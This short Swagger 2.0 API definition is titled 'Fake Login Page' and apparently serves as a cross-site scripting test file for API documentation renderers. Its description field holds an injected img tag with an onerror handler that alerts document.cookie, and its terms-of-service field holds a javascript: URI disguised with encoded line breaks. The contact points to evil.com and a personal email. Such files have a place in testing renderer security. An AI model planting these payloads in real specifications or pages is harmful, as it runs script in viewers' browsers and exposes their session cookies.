swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: '#"><img src=/ onerror=alert(document.cookie)>'
  termsOfService: java%0d%0ascript%0d%0a:alert(0)
  contact: 
    name: "API Support"
    url: "https://evil.com/"
    email: "bilalabbasuk@gmail.com"



  
